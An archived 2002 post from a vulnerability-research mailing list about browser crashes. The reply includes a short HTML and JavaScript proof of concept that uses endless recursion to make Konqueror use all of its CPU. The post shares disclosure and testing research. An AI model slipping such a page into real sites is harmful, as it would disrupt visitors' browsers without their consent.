Vulnerability Development: Re: Buffer Overflow with all versions of Internet Explorer and Javacript.

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

Re: Buffer Overflow with all versions of Internet Explorer and Javacript.

From: Jacek Lach <jlach () utopia pl eu org>
Date: Mon, 3 Jun 2002 12:31:02 +0000

On Sunday 02 June 2002 23:47, Scott Mackenzie wrote:

After a few minutes testing it seems this does not only effect Internet
Explorer but also the following browsers:


In KDE's konqueror Latest Version it Seg Faults the browser instantly

a bit OT, but anyway, I also checked this and
Konqeror 3.0.0 hogs the CPU, but there was no segfault, the same effect (100% 
CPU utilization) is done by simply this:
<html><head></head>
<script language="JAVASCRIPT">
function foo() {
foo();
}
</script>
<input type="button" onClick="foo();" value="SMASH!"></input>
</html>

This situation is handled by both IE and Mozilla 1.0rc1 (no hogs there)

Regards,
Jacek Lach

By Date By Thread

Current thread:

Buffer Overflow with all versions of Internet Explorer and Javacript. Matias Sedalo (Jun 02)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Scott Mackenzie (Jun 02)
  - Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Jacek Lach (Jun 03)
    - Re: Buffer Overflow with all versions of Internet Explorer and Javacript. George Staikos (Jun 03)
    - Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Nicolas Sigal (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Gian Fabio Palmerini (Jun 03)